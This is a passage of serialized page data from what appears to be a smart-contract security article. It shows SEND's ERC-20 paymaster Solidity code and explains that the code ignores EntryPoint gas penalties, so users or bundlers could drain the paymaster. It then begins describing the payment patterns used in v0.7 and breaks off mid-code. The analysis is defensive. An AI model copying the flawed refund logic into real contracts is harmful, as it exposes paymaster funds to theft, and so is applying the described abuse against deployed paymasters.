",{"type":24,"tag":301,"props":110195,"children":110196},{"style":385},[110197],{"type":30,"value":11206},{"type":24,"tag":301,"props":110199,"children":110200},{"style":466},[110201],{"type":30,"value":109925},{"type":24,"tag":301,"props":110203,"children":110204},{"style":359},[110205],{"type":30,"value":110206},"]));\n",{"type":24,"tag":301,"props":110208,"children":110209},{"class":303,"line":3639},[110210,110215,110220,110224],{"type":24,"tag":301,"props":110211,"children":110212},{"style":308},[110213],{"type":30,"value":110214}," if",{"type":24,"tag":301,"props":110216,"children":110217},{"style":359},[110218],{"type":30,"value":110219}," (clientSuppliedPrice ",{"type":24,"tag":301,"props":110221,"children":110222},{"style":385},[110223],{"type":30,"value":1849},{"type":24,"tag":301,"props":110225,"children":110226},{"style":359},[110227],{"type":30,"value":110228}," cachedPriceWithMarkup) {\n",{"type":24,"tag":301,"props":110230,"children":110231},{"class":303,"line":3647},[110232,110237,110241],{"type":24,"tag":301,"props":110233,"children":110234},{"style":1062},[110235],{"type":30,"value":110236}," // ",{"type":24,"tag":301,"props":110238,"children":110239},{"style":348},[110240],{"type":30,"value":73471},{"type":24,"tag":301,"props":110242,"children":110243},{"style":1062},[110244],{"type":30,"value":110245},": smaller number means 'more native asset per token'\n",{"type":24,"tag":301,"props":110247,"children":110248},{"class":303,"line":3685},[110249,110254,110258],{"type":24,"tag":301,"props":110250,"children":110251},{"style":359},[110252],{"type":30,"value":110253}," cachedPriceWithMarkup ",{"type":24,"tag":301,"props":110255,"children":110256},{"style":385},[110257],{"type":30,"value":523},{"type":24,"tag":301,"props":110259,"children":110260},{"style":359},[110261],{"type":30,"value":110262}," clientSuppliedPrice;\n",{"type":24,"tag":301,"props":110264,"children":110265},{"class":303,"line":3713},[110266],{"type":24,"tag":301,"props":110267,"children":110268},{"style":359},[110269],{"type":30,"value":4211},{"type":24,"tag":301,"props":110271,"children":110272},{"class":303,"line":3721},[110273],{"type":24,"tag":301,"props":110274,"children":110275},{"style":359},[110276],{"type":30,"value":65600},{"type":24,"tag":301,"props":110278,"children":110279},{"class":303,"line":3751},[110280,110284,110289,110293,110298],{"type":24,"tag":301,"props":110281,"children":110282},{"style":10246},[110283],{"type":30,"value":109822},{"type":24,"tag":301,"props":110285,"children":110286},{"style":359},[110287],{"type":30,"value":110288}," tokenAmount ",{"type":24,"tag":301,"props":110290,"children":110291},{"style":385},[110292],{"type":30,"value":523},{"type":24,"tag":301,"props":110294,"children":110295},{"style":314},[110296],{"type":30,"value":110297}," weiToToken",{"type":24,"tag":301,"props":110299,"children":110300},{"style":359},[110301],{"type":30,"value":110302},"(preChargeNative, cachedPriceWithMarkup);\n",{"type":24,"tag":301,"props":110304,"children":110305},{"class":303,"line":3782},[110306,110311,110315],{"type":24,"tag":301,"props":110307,"children":110308},{"style":359},[110309],{"type":30,"value":110310}," tokenAmount ",{"type":24,"tag":301,"props":110312,"children":110313},{"style":385},[110314],{"type":30,"value":75150},{"type":24,"tag":301,"props":110316,"children":110317},{"style":359},[110318],{"type":30,"value":110319}," baseFee;\n",{"type":24,"tag":301,"props":110321,"children":110322},{"class":303,"line":3791},[110323,110328,110333,110338,110342,110346,110350],{"type":24,"tag":301,"props":110324,"children":110325},{"style":359},[110326],{"type":30,"value":110327}," SafeERC20.",{"type":24,"tag":301,"props":110329,"children":110330},{"style":314},[110331],{"type":30,"value":110332},"safeTransferFrom",{"type":24,"tag":301,"props":110334,"children":110335},{"style":359},[110336],{"type":30,"value":110337},"(token, userOp.sender, ",{"type":24,"tag":301,"props":110339,"children":110340},{"style":10246},[110341],{"type":30,"value":39391},{"type":24,"tag":301,"props":110343,"children":110344},{"style":359},[110345],{"type":30,"value":362},{"type":24,"tag":301,"props":110347,"children":110348},{"style":348},[110349],{"type":30,"value":8801},{"type":24,"tag":301,"props":110351,"children":110352},{"style":359},[110353],{"type":30,"value":110354},"), tokenAmount);\n",{"type":24,"tag":301,"props":110356,"children":110357},{"class":303,"line":3819},[110358,110363,110367,110372,110376,110381],{"type":24,"tag":301,"props":110359,"children":110360},{"style":359},[110361],{"type":30,"value":110362}," context ",{"type":24,"tag":301,"props":110364,"children":110365},{"style":385},[110366],{"type":30,"value":523},{"type":24,"tag":301,"props":110368,"children":110369},{"style":348},[110370],{"type":30,"value":110371}," abi",{"type":24,"tag":301,"props":110373,"children":110374},{"style":359},[110375],{"type":30,"value":206},{"type":24,"tag":301,"props":110377,"children":110378},{"style":314},[110379],{"type":30,"value":110380},"encode",{"type":24,"tag":301,"props":110382,"children":110383},{"style":359},[110384],{"type":30,"value":110385},"(tokenAmount, userOp.sender);\n",{"type":24,"tag":301,"props":110387,"children":110388},{"class":303,"line":4397},[110389,110394],{"type":24,"tag":301,"props":110390,"children":110391},{"style":359},[110392],{"type":30,"value":110393}," validationResult ",{"type":24,"tag":301,"props":110395,"children":110396},{"style":385},[110397],{"type":30,"value":21485},{"type":24,"tag":301,"props":110399,"children":110400},{"class":303,"line":4405},[110401,110406,110410,110414,110418,110423,110428,110432,110437,110441],{"type":24,"tag":301,"props":110402,"children":110403},{"style":314},[110404],{"type":30,"value":110405}," _packValidationData",{"type":24,"tag":301,"props":110407,"children":110408},{"style":359},[110409],{"type":30,"value":362},{"type":24,"tag":301,"props":110411,"children":110412},{"style":348},[110413],{"type":30,"value":14990},{"type":24,"tag":301,"props":110415,"children":110416},{"style":359},[110417],{"type":30,"value":377},{"type":24,"tag":301,"props":110419,"children":110420},{"style":10246},[110421],{"type":30,"value":110422},"uint48",{"type":24,"tag":301,"props":110424,"children":110425},{"style":359},[110426],{"type":30,"value":110427},"(cachedPriceTimestamp ",{"type":24,"tag":301,"props":110429,"children":110430},{"style":385},[110431],{"type":30,"value":11206},{"type":24,"tag":301,"props":110433,"children":110434},{"style":359},[110435],{"type":30,"value":110436}," tokenPaymasterConfig.priceMaxAge), ",{"type":24,"tag":301,"props":110438,"children":110439},{"style":466},[110440],{"type":30,"value":584},{"type":24,"tag":301,"props":110442,"children":110443},{"style":359},[110444],{"type":30,"value":589},{"type":24,"tag":301,"props":110446,"children":110447},{"class":303,"line":4422},[110448],{"type":24,"tag":301,"props":110449,"children":110450},{"style":359},[110451],{"type":30,"value":3345},{"type":24,"tag":301,"props":110453,"children":110454},{"class":303,"line":4438},[110455],{"type":24,"tag":301,"props":110456,"children":110457},{"style":359},[110458],{"type":30,"value":501},{"type":24,"tag":301,"props":110460,"children":110461},{"class":303,"line":4446},[110462],{"type":24,"tag":301,"props":110463,"children":110464},{"style":359},[110465],{"type":30,"value":17123},{"type":24,"tag":301,"props":110467,"children":110468},{"class":303,"line":4506},[110469,110473,110478,110482,110487,110491,110495,110499,110503,110507,110511,110516,110520,110524,110529],{"type":24,"tag":301,"props":110470,"children":110471},{"style":348},[110472],{"type":30,"value":96533},{"type":24,"tag":301,"props":110474,"children":110475},{"style":314},[110476],{"type":30,"value":110477}," _postOp",{"type":24,"tag":301,"props":110479,"children":110480},{"style":359},[110481],{"type":30,"value":362},{"type":24,"tag":301,"props":110483,"children":110484},{"style":348},[110485],{"type":30,"value":110486},"PostOpMode",{"type":24,"tag":301,"props":110488,"children":110489},{"style":359},[110490],{"type":30,"value":377},{"type":24,"tag":301,"props":110492,"children":110493},{"style":10246},[110494],{"type":30,"value":90533},{"type":24,"tag":301,"props":110496,"children":110497},{"style":348},[110498],{"type":30,"value":109706},{"type":24,"tag":301,"props":110500,"children":110501},{"style":369},[110502],{"type":30,"value":83053},{"type":24,"tag":301,"props":110504,"children":110505},{"style":359},[110506],{"type":30,"value":377},{"type":24,"tag":301,"props":110508,"children":110509},{"style":10246},[110510],{"type":30,"value":52904},{"type":24,"tag":301,"props":110512,"children":110513},{"style":369},[110514],{"type":30,"value":110515}," actualGasCost",{"type":24,"tag":301,"props":110517,"children":110518},{"style":359},[110519],{"type":30,"value":377},{"type":24,"tag":301,"props":110521,"children":110522},{"style":10246},[110523],{"type":30,"value":52904},{"type":24,"tag":301,"props":110525,"children":110526},{"style":369},[110527],{"type":30,"value":110528}," actualUserOpFeePerGas",{"type":24,"tag":301,"props":110530,"children":110531},{"style":359},[110532],{"type":30,"value":791},{"type":24,"tag":301,"props":110534,"children":110535},{"class":303,"line":4566},[110536],{"type":24,"tag":301,"props":110537,"children":110538},{"style":348},[110539],{"type":30,"value":109745},{"type":24,"tag":301,"props":110541,"children":110542},{"class":303,"line":4574},[110543],{"type":24,"tag":301,"props":110544,"children":110545},{"style":348},[110546],{"type":30,"value":109753},{"type":24,"tag":301,"props":110548,"children":110549},{"class":303,"line":4590},[110550],{"type":24,"tag":301,"props":110551,"children":110552},{"style":359},[110553],{"type":30,"value":35943},{"type":24,"tag":301,"props":110555,"children":110556},{"class":303,"line":4599},[110557,110561],{"type":24,"tag":301,"props":110558,"children":110559},{"style":308},[110560],{"type":30,"value":109810},{"type":24,"tag":301,"props":110562,"children":110563},{"style":359},[110564],{"type":30,"value":3035},{"type":24,"tag":301,"props":110566,"children":110567},{"class":303,"line":4629},[110568,110572,110576,110580],{"type":24,"tag":301,"props":110569,"children":110570},{"style":10246},[110571],{"type":30,"value":109822},{"type":24,"tag":301,"props":110573,"children":110574},{"style":359},[110575],{"type":30,"value":109827},{"type":24,"tag":301,"props":110577,"children":110578},{"style":385},[110579],{"type":30,"value":523},{"type":24,"tag":301,"props":110581,"children":110582},{"style":359},[110583],{"type":30,"value":109836},{"type":24,"tag":301,"props":110585,"children":110586},{"class":303,"line":4659},[110587,110591,110595,110599],{"type":24,"tag":301,"props":110588,"children":110589},{"style":10246},[110590],{"type":30,"value":109822},{"type":24,"tag":301,"props":110592,"children":110593},{"style":359},[110594],{"type":30,"value":109848},{"type":24,"tag":301,"props":110596,"children":110597},{"style":385},[110598],{"type":30,"value":523},{"type":24,"tag":301,"props":110600,"children":110601},{"style":359},[110602],{"type":30,"value":109857},{"type":24,"tag":301,"props":110604,"children":110605},{"class":303,"line":4668},[110606,110611,110615,110620,110624,110629,110633,110637,110641,110646,110651,110655,110659,110663],{"type":24,"tag":301,"props":110607,"children":110608},{"style":359},[110609],{"type":30,"value":110610}," (",{"type":24,"tag":301,"props":110612,"children":110613},{"style":10246},[110614],{"type":30,"value":52904},{"type":24,"tag":301,"props":110616,"children":110617},{"style":359},[110618],{"type":30,"value":110619}," preCharge, ",{"type":24,"tag":301,"props":110621,"children":110622},{"style":10246},[110623],{"type":30,"value":39391},{"type":24,"tag":301,"props":110625,"children":110626},{"style":359},[110627],{"type":30,"value":110628}," userOpSender) ",{"type":24,"tag":301,"props":110630,"children":110631},{"style":385},[110632],{"type":30,"value":523},{"type":24,"tag":301,"props":110634,"children":110635},{"style":348},[110636],{"type":30,"value":110371},{"type":24,"tag":301,"props":110638,"children":110639},{"style":359},[110640],{"type":30,"value":206},{"type":24,"tag":301,"props":110642,"children":110643},{"style":314},[110644],{"type":30,"value":110645},"decode",{"type":24,"tag":301,"props":110647,"children":110648},{"style":359},[110649],{"type":30,"value":110650},"(context, (",{"type":24,"tag":301,"props":110652,"children":110653},{"style":10246},[110654],{"type":30,"value":52904},{"type":24,"tag":301,"props":110656,"children":110657},{"style":359},[110658],{"type":30,"value":377},{"type":24,"tag":301,"props":110660,"children":110661},{"style":10246},[110662],{"type":30,"value":39391},{"type":24,"tag":301,"props":110664,"children":110665},{"style":359},[110666],{"type":30,"value":3416},{"type":24,"tag":301,"props":110668,"children":110669},{"class":303,"line":4677},[110670,110675,110680,110685],{"type":24,"tag":301,"props":110671,"children":110672},{"style":359},[110673],{"type":30,"value":110674}," preCharge ",{"type":24,"tag":301,"props":110676,"children":110677},{"style":385},[110678],{"type":30,"value":110679},"-=",{"type":24,"tag":301,"props":110681,"children":110682},{"style":359},[110683],{"type":30,"value":110684}," baseFee; ",{"type":24,"tag":301,"props":110686,"children":110687},{"style":1062},[110688],{"type":30,"value":110689},"// don't refund the base fee\n",{"type":24,"tag":301,"props":110691,"children":110692},{"class":303,"line":4697},[110693,110697,110702,110706,110711,110715,110719],{"type":24,"tag":301,"props":110694,"children":110695},{"style":10246},[110696],{"type":30,"value":109822},{"type":24,"tag":301,"props":110698,"children":110699},{"style":359},[110700],{"type":30,"value":110701}," _cachedPrice ",{"type":24,"tag":301,"props":110703,"children":110704},{"style":385},[110705],{"type":30,"value":523},{"type":24,"tag":301,"props":110707,"children":110708},{"style":314},[110709],{"type":30,"value":110710}," updateCachedPrice",{"type":24,"tag":301,"props":110712,"children":110713},{"style":359},[110714],{"type":30,"value":362},{"type":24,"tag":301,"props":110716,"children":110717},{"style":348},[110718],{"type":30,"value":14990},{"type":24,"tag":301,"props":110720,"children":110721},{"style":359},[110722],{"type":30,"value":589},{"type":24,"tag":301,"props":110724,"children":110725},{"class":303,"line":4725},[110726,110730,110734],{"type":24,"tag":301,"props":110727,"children":110728},{"style":1062},[110729],{"type":30,"value":110074},{"type":24,"tag":301,"props":110731,"children":110732},{"style":348},[110733],{"type":30,"value":73471},{"type":24,"tag":301,"props":110735,"children":110736},{"style":1062},[110737],{"type":30,"value":110083},{"type":24,"tag":301,"props":110739,"children":110740},{"class":303,"line":4733},[110741,110745,110749,110753,110757,110761,110765,110769],{"type":24,"tag":301,"props":110742,"children":110743},{"style":10246},[110744],{"type":30,"value":109822},{"type":24,"tag":301,"props":110746,"children":110747},{"style":359},[110748],{"type":30,"value":110095},{"type":24,"tag":301,"props":110750,"children":110751},{"style":385},[110752],{"type":30,"value":523},{"type":24,"tag":301,"props":110754,"children":110755},{"style":359},[110756],{"type":30,"value":110701},{"type":24,"tag":301,"props":110758,"children":110759},{"style":385},[110760],{"type":30,"value":772},{"type":24,"tag":301,"props":110762,"children":110763},{"style":359},[110764],{"type":30,"value":110113},{"type":24,"tag":301,"props":110766,"children":110767},{"style":385},[110768],{"type":30,"value":1036},{"type":24,"tag":301,"props":110770,"children":110771},{"style":359},[110772],{"type":30,"value":110122},{"type":24,"tag":301,"props":110774,"children":110775},{"class":303,"line":4741},[110776],{"type":24,"tag":301,"props":110777,"children":110778},{"style":1062},[110779],{"type":30,"value":110780}," // Refund tokens based on actual gas cost\n",{"type":24,"tag":301,"props":110782,"children":110783},{"class":303,"line":4757},[110784,110788,110793,110797,110802,110806,110811,110815],{"type":24,"tag":301,"props":110785,"children":110786},{"style":10246},[110787],{"type":30,"value":109822},{"type":24,"tag":301,"props":110789,"children":110790},{"style":359},[110791],{"type":30,"value":110792}," actualChargeNative ",{"type":24,"tag":301,"props":110794,"children":110795},{"style":385},[110796],{"type":30,"value":523},{"type":24,"tag":301,"props":110798,"children":110799},{"style":359},[110800],{"type":30,"value":110801}," actualGasCost ",{"type":24,"tag":301,"props":110803,"children":110804},{"style":385},[110805],{"type":30,"value":11206},{"type":24,"tag":301,"props":110807,"children":110808},{"style":359},[110809],{"type":30,"value":110810}," tokenPaymasterConfig.refundPostopCost ",{"type":24,"tag":301,"props":110812,"children":110813},{"style":385},[110814],{"type":30,"value":772},{"type":24,"tag":301,"props":110816,"children":110817},{"style":359},[110818],{"type":30,"value":110819}," actualUserOpFeePerGas;\n",{"type":24,"tag":301,"props":110821,"children":110822},{"class":303,"line":4765},[110823,110827,110832,110836,110840],{"type":24,"tag":301,"props":110824,"children":110825},{"style":10246},[110826],{"type":30,"value":109822},{"type":24,"tag":301,"props":110828,"children":110829},{"style":359},[110830],{"type":30,"value":110831}," actualTokenNeeded ",{"type":24,"tag":301,"props":110833,"children":110834},{"style":385},[110835],{"type":30,"value":523},{"type":24,"tag":301,"props":110837,"children":110838},{"style":314},[110839],{"type":30,"value":110297},{"type":24,"tag":301,"props":110841,"children":110842},{"style":359},[110843],{"type":30,"value":110844},"(actualChargeNative, cachedPriceWithMarkup);\n",{"type":24,"tag":301,"props":110846,"children":110847},{"class":303,"line":4773},[110848,110852,110857,110861],{"type":24,"tag":301,"props":110849,"children":110850},{"style":308},[110851],{"type":30,"value":65516},{"type":24,"tag":301,"props":110853,"children":110854},{"style":359},[110855],{"type":30,"value":110856}," (preCharge ",{"type":24,"tag":301,"props":110858,"children":110859},{"style":385},[110860],{"type":30,"value":1456},{"type":24,"tag":301,"props":110862,"children":110863},{"style":359},[110864],{"type":30,"value":110865}," actualTokenNeeded) {\n",{"type":24,"tag":301,"props":110867,"children":110868},{"class":303,"line":4781},[110869],{"type":24,"tag":301,"props":110870,"children":110871},{"style":1062},[110872],{"type":30,"value":110873}," // If initially provided token amount is greater than the actual amount needed, refund the difference\n",{"type":24,"tag":301,"props":110875,"children":110876},{"class":303,"line":4789},[110877,110882,110887,110892,110896],{"type":24,"tag":301,"props":110878,"children":110879},{"style":359},[110880],{"type":30,"value":110881}," SafeERC20.",{"type":24,"tag":301,"props":110883,"children":110884},{"style":314},[110885],{"type":30,"value":110886},"safeTransfer",{"type":24,"tag":301,"props":110888,"children":110889},{"style":359},[110890],{"type":30,"value":110891},"(token, userOpSender, preCharge ",{"type":24,"tag":301,"props":110893,"children":110894},{"style":385},[110895],{"type":30,"value":9253},{"type":24,"tag":301,"props":110897,"children":110898},{"style":359},[110899],{"type":30,"value":110900}," actualTokenNeeded);\n",{"type":24,"tag":301,"props":110902,"children":110903},{"class":303,"line":4848},[110904,110908,110912,110916,110920,110924],{"type":24,"tag":301,"props":110905,"children":110906},{"style":359},[110907],{"type":30,"value":77307},{"type":24,"tag":301,"props":110909,"children":110910},{"style":308},[110911],{"type":30,"value":10144},{"type":24,"tag":301,"props":110913,"children":110914},{"style":308},[110915],{"type":30,"value":22574},{"type":24,"tag":301,"props":110917,"children":110918},{"style":359},[110919],{"type":30,"value":110856},{"type":24,"tag":301,"props":110921,"children":110922},{"style":385},[110923],{"type":30,"value":1849},{"type":24,"tag":301,"props":110925,"children":110926},{"style":359},[110927],{"type":30,"value":110865},{"type":24,"tag":301,"props":110929,"children":110930},{"class":303,"line":4862},[110931],{"type":24,"tag":301,"props":110932,"children":110933},{"style":1062},[110934],{"type":30,"value":110935}," // Attempt to cover Paymaster's gas expenses by withdrawing the 'overdraft' from the client\n",{"type":24,"tag":301,"props":110937,"children":110938},{"class":303,"line":4871},[110939],{"type":24,"tag":301,"props":110940,"children":110941},{"style":1062},[110942],{"type":30,"value":110943}," // If the transfer reverts also revert the 'postOp' to remove the incentive to cheat\n",{"type":24,"tag":301,"props":110945,"children":110946},{"class":303,"line":4879},[110947,110951,110955,110960,110964,110968,110972,110977,110981],{"type":24,"tag":301,"props":110948,"children":110949},{"style":359},[110950],{"type":30,"value":110881},{"type":24,"tag":301,"props":110952,"children":110953},{"style":314},[110954],{"type":30,"value":110332},{"type":24,"tag":301,"props":110956,"children":110957},{"style":359},[110958],{"type":30,"value":110959},"(token, userOpSender, ",{"type":24,"tag":301,"props":110961,"children":110962},{"style":10246},[110963],{"type":30,"value":39391},{"type":24,"tag":301,"props":110965,"children":110966},{"style":359},[110967],{"type":30,"value":362},{"type":24,"tag":301,"props":110969,"children":110970},{"style":348},[110971],{"type":30,"value":8801},{"type":24,"tag":301,"props":110973,"children":110974},{"style":359},[110975],{"type":30,"value":110976},"), actualTokenNeeded ",{"type":24,"tag":301,"props":110978,"children":110979},{"style":385},[110980],{"type":30,"value":9253},{"type":24,"tag":301,"props":110982,"children":110983},{"style":359},[110984],{"type":30,"value":110985}," preCharge);\n",{"type":24,"tag":301,"props":110987,"children":110988},{"class":303,"line":4942},[110989],{"type":24,"tag":301,"props":110990,"children":110991},{"style":359},[110992],{"type":30,"value":65600},{"type":24,"tag":301,"props":110994,"children":110995},{"class":303,"line":4955},[110996],{"type":24,"tag":301,"props":110997,"children":110998},{"emptyLinePlaceholder":16},[110999],{"type":30,"value":341},{"type":24,"tag":301,"props":111001,"children":111002},{"class":303,"line":94926},[111003,111007,111012,111016,111020],{"type":24,"tag":301,"props":111004,"children":111005},{"style":308},[111006],{"type":30,"value":65516},{"type":24,"tag":301,"props":111008,"children":111009},{"style":359},[111010],{"type":30,"value":111011}," (baseFee ",{"type":24,"tag":301,"props":111013,"children":111014},{"style":385},[111015],{"type":30,"value":1456},{"type":24,"tag":301,"props":111017,"children":111018},{"style":466},[111019],{"type":30,"value":685},{"type":24,"tag":301,"props":111021,"children":111022},{"style":359},[111023],{"type":30,"value":398},{"type":24,"tag":301,"props":111025,"children":111026},{"class":303,"line":94934},[111027,111031,111035],{"type":24,"tag":301,"props":111028,"children":111029},{"style":359},[111030],{"type":30,"value":110881},{"type":24,"tag":301,"props":111032,"children":111033},{"style":314},[111034],{"type":30,"value":110886},{"type":24,"tag":301,"props":111036,"children":111037},{"style":359},[111038],{"type":30,"value":111039},"(token, tokenPaymasterConfig.rewardsPool, baseFee);\n",{"type":24,"tag":301,"props":111041,"children":111042},{"class":303,"line":108273},[111043],{"type":24,"tag":301,"props":111044,"children":111045},{"style":359},[111046],{"type":30,"value":65600},{"type":24,"tag":301,"props":111048,"children":111049},{"class":303,"line":108281},[111050],{"type":24,"tag":301,"props":111051,"children":111052},{"emptyLinePlaceholder":16},[111053],{"type":30,"value":341},{"type":24,"tag":301,"props":111055,"children":111056},{"class":303,"line":108289},[111057,111062,111067],{"type":24,"tag":301,"props":111058,"children":111059},{"style":308},[111060],{"type":30,"value":111061}," emit",{"type":24,"tag":301,"props":111063,"children":111064},{"style":314},[111065],{"type":30,"value":111066}," UserOperationSponsored",{"type":24,"tag":301,"props":111068,"children":111069},{"style":359},[111070],{"type":30,"value":111071},"(userOpSender, actualTokenNeeded, actualGasCost, cachedPriceWithMarkup, baseFee);\n",{"type":24,"tag":301,"props":111073,"children":111074},{"class":303,"line":108297},[111075,111080],{"type":24,"tag":301,"props":111076,"children":111077},{"style":314},[111078],{"type":30,"value":111079}," refillEntryPointDeposit",{"type":24,"tag":301,"props":111081,"children":111082},{"style":359},[111083],{"type":30,"value":111084},"(_cachedPrice);\n",{"type":24,"tag":301,"props":111086,"children":111087},{"class":303,"line":108325},[111088],{"type":24,"tag":301,"props":111089,"children":111090},{"style":359},[111091],{"type":30,"value":3345},{"type":24,"tag":301,"props":111093,"children":111095},{"class":303,"line":111094},67,[111096],{"type":24,"tag":301,"props":111097,"children":111098},{"style":359},[111099],{"type":30,"value":501},{"type":24,"tag":301,"props":111101,"children":111103},{"class":303,"line":111102},68,[111104],{"type":24,"tag":301,"props":111105,"children":111106},{"style":359},[111107],{"type":30,"value":698},{"type":24,"tag":32,"props":111109,"children":111110},{},[111111,111113,111119,111121,111126,111128,111134],{"type":30,"value":111112},"Looking at the code above, during ",{"type":24,"tag":145,"props":111114,"children":111116},{"className":111115},[],[111117],{"type":30,"value":111118},"validatePaymasterUserOp",{"type":30,"value":111120},", the paymaster attempts to charge a maximum prefund amount first. This prefund is calculated by taking the gas limit specified in the ",{"type":24,"tag":145,"props":111122,"children":111124},{"className":111123},[],[111125],{"type":30,"value":109177},{"type":30,"value":111127}," and applying a markup price to convert the native ETH cost into the equivalent ERC20-token value. Later in ",{"type":24,"tag":145,"props":111129,"children":111131},{"className":111130},[],[111132],{"type":30,"value":111133},"postOp",{"type":30,"value":111135},", the paymaster calculates the actual charge and refunds any excess from the prefund.",{"type":24,"tag":32,"props":111137,"children":111138},{},[111139,111141,111146,111148,111155],{"type":30,"value":111140},"However, there is a critical oversight: ",{"type":24,"tag":60,"props":111142,"children":111143},{},[111144],{"type":30,"value":111145},"the code does not account for gas penalties",{"type":30,"value":111147},". The actual gas charged to the paymaster includes not just the gas used, but also any ",{"type":24,"tag":188,"props":111149,"children":111152},{"href":111150,"rel":111151},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.7/contracts/core/EntryPoint.sol#L726-L730",[192],[111153],{"type":30,"value":111154},"penalties incurred",{"type":30,"value":111156}," from differences between the execution gas limit and actual execution gas.",{"type":24,"tag":32,"props":111158,"children":111159},{},[111160],{"type":30,"value":111161},"This vulnerability can be exploited by malicious users who set an artificially high gas limit to trigger the penalty. When penalties are applied, the paymaster will be charged significantly more than expected, potentially draining its funds since these additional costs were not factored into the calculation.",{"type":24,"tag":32,"props":111163,"children":111164},{},[111165,111167,111172],{"type":30,"value":111166},"In fact, the bundler will be the one who receives the penalty paid by the paymaster. This means a bundler could submit their own ",{"type":24,"tag":145,"props":111168,"children":111170},{"className":111169},[],[111171],{"type":30,"value":108878},{"type":30,"value":111173}," to be executed by themselves and profit if the penalty they can extract from the paymaster exceeds their own gas costs paid to the paymaster. In SEND's case, fortunately, because they operate their own bundler, any penalties incurred flow back to their controlled bundler, creating a closed economic loop that mitigates this particular attack vector.",{"type":24,"tag":43,"props":111175,"children":111177},{"id":111176},"incorrect-erc-20-handling",[111178],{"type":24,"tag":60,"props":111179,"children":111180},{},[111181],{"type":30,"value":111182},"Incorrect ERC-20 Handling",{"type":24,"tag":32,"props":111184,"children":111185},{},[111186],{"type":30,"value":111187},"To improve user experience, some protocols introduced ERC-20 paymasters that allow users to pay transaction gas fees using ERC-20 tokens instead of native ETH (Just like what SEND did in the above code). The core concept is quite straightforward, the paymaster fronts the ETH gas costs to bundlers, then charges users an equivalent amount in ERC-20 tokens based on current market rates. However, implementing this token-to-ETH conversion and payment flow securely requires careful consideration.",{"type":24,"tag":32,"props":111189,"children":111190},{},[111191,111192,111197,111199,111204],{"type":30,"value":52032},{"type":24,"tag":145,"props":111193,"children":111195},{"className":111194},[],[111196],{"type":30,"value":108959},{"type":30,"value":111198}," flow above, we can see that paymasters have two key interaction points during a ",{"type":24,"tag":145,"props":111200,"children":111202},{"className":111201},[],[111203],{"type":30,"value":108878},{"type":30,"value":111205},"'s lifecycle:",{"type":24,"tag":6246,"props":111207,"children":111208},{},[111209,111219],{"type":24,"tag":2659,"props":111210,"children":111211},{},[111212,111214],{"type":30,"value":111213},"During validation via ",{"type":24,"tag":145,"props":111215,"children":111217},{"className":111216},[],[111218],{"type":30,"value":109064},{"type":24,"tag":2659,"props":111220,"children":111221},{},[111222,111224],{"type":30,"value":111223},"After execution via ",{"type":24,"tag":145,"props":111225,"children":111227},{"className":111226},[],[111228],{"type":30,"value":109075},{"type":24,"tag":32,"props":111230,"children":111231},{},[111232],{"type":30,"value":111233},"This dual-interaction model has led to two predominant patterns for handling ERC-20 payments in paymaster implementations:",{"type":24,"tag":80,"props":111235,"children":111237},{"id":111236},"_1-pre-payment-with-refund-pattern",[111238],{"type":30,"value":111239},"1. Pre-Payment with Refund Pattern",{"type":24,"tag":32,"props":111241,"children":111242},{},[111243,111245,111250,111252,111257,111259,111265,111266,111272,111274,111279,111281,111286,111288,111293],{"type":30,"value":111244},"In this model, the paymaster requires users to pre-pay the maximum possible gas cost in ERC-20 tokens during ",{"type":24,"tag":145,"props":111246,"children":111248},{"className":111247},[],[111249],{"type":30,"value":109064},{"type":30,"value":111251},". After execution completes, ",{"type":24,"tag":145,"props":111253,"children":111255},{"className":111254},[],[111256],{"type":30,"value":109075},{"type":30,"value":111258}," refunds any excess tokens based on actual gas consumed. This is analogous to how regular ETH gas payments work. Several protocols like ",{"type":24,"tag":145,"props":111260,"children":111262},{"className":111261},[],[111263],{"type":30,"value":111264},"SEND",{"type":30,"value":2378},{"type":24,"tag":145,"props":111267,"children":111269},{"className":111268},[],[111270],{"type":30,"value":111271},"Circle",{"type":30,"value":111273}," have implemented this approach. However, this pattern has one key disadvantage: users must first approve the paymaster to spend their ERC20 tokens before submitting any ",{"type":24,"tag":145,"props":111275,"children":111277},{"className":111276},[],[111278],{"type":30,"value":108907},{"type":30,"value":111280},". This additional setup step is required to ensure the paymaster can successfully deduct tokens ",{"type":24,"tag":60,"props":111282,"children":111283},{},[111284],{"type":30,"value":111285},"before",{"type":30,"value":111287}," execution (specifically during ",{"type":24,"tag":145,"props":111289,"children":111291},{"className":111290},[],[111292],{"type":30,"value":111118},{"type":30,"value":27511},{"type":24,"tag":80,"props":111295,"children":111297},{"id":111296},"_2-post-execution-charging-pattern",[111298],{"type":30,"value":111299},"2. Post-Execution Charging Pattern",{"type":24,"tag":32,"props":111301,"children":111302},{},[111303,111305,111310,111312,111317,111319,111324,111326,111331],{"type":30,"value":111304},"This alternative approach defers token collection until after execution. Instead of charging a prefund during ",{"type":24,"tag":145,"props":111306,"children":111308},{"className":111307},[],[111309],{"type":30,"value":109064},{"type":30,"value":111311},", the actual token payment is calculated and collected in ",{"type":24,"tag":145,"props":111313,"children":111315},{"className":111314},[],[111316],{"type":30,"value":109075},{"type":30,"value":111318}," based on the exact gas consumed. At first glance, this appears to be the most user-friendly pattern since users can bundle their token approval transaction within the same ",{"type":24,"tag":145,"props":111320,"children":111322},{"className":111321},[],[111323],{"type":30,"value":108878},{"type":30,"value":111325},", eliminating the need for a separate pre-approval transaction before submitting the ",{"type":24,"tag":145,"props":111327,"children":111329},{"className":111328},[],[111330],{"type":30,"value":109177},{"type":30,"value":111332},". This means users could interact with the paymaster without any prior setup.",{"type":24,"tag":32,"props":111334,"children":111335},{},[111336,111338,111343,111345,111351,111353,111359,111361,111366],{"type":30,"value":111337},"This approach used to work in ",{"type":24,"tag":145,"props":111339,"children":111341},{"className":111340},[],[111342],{"type":30,"value":108959},{"type":30,"value":111344}," version ",{"type":24,"tag":145,"props":111346,"children":111348},{"className":111347},[],[111349],{"type":30,"value":111350},"v0.6",{"type":30,"value":111352},", but the pattern no longer works in ",{"type":24,"tag":145,"props":111354,"children":111356},{"className":111355},[],[111357],{"type":30,"value":111358},"v0.7",{"type":30,"value":111360},". In fact, using this pattern can lead to loss of funds for the paymaster. Let's take a closer look at how ",{"type":24,"tag":145,"props":111362,"children":111364},{"className":111363},[],[111365],{"type":30,"value":111358},{"type":30,"value":111367}," handles the execution phase:",{"type":24,"tag":291,"props":111369,"children":111371},{"className":11300,"code":111370,"language":11299,"meta":7,"style":7}," function _executeUserOp(\n uint256 opIndex,\n PackedUserOperation calldata userOp,\n UserOpInfo memory opInfo\n )\n internal virtual\n returns 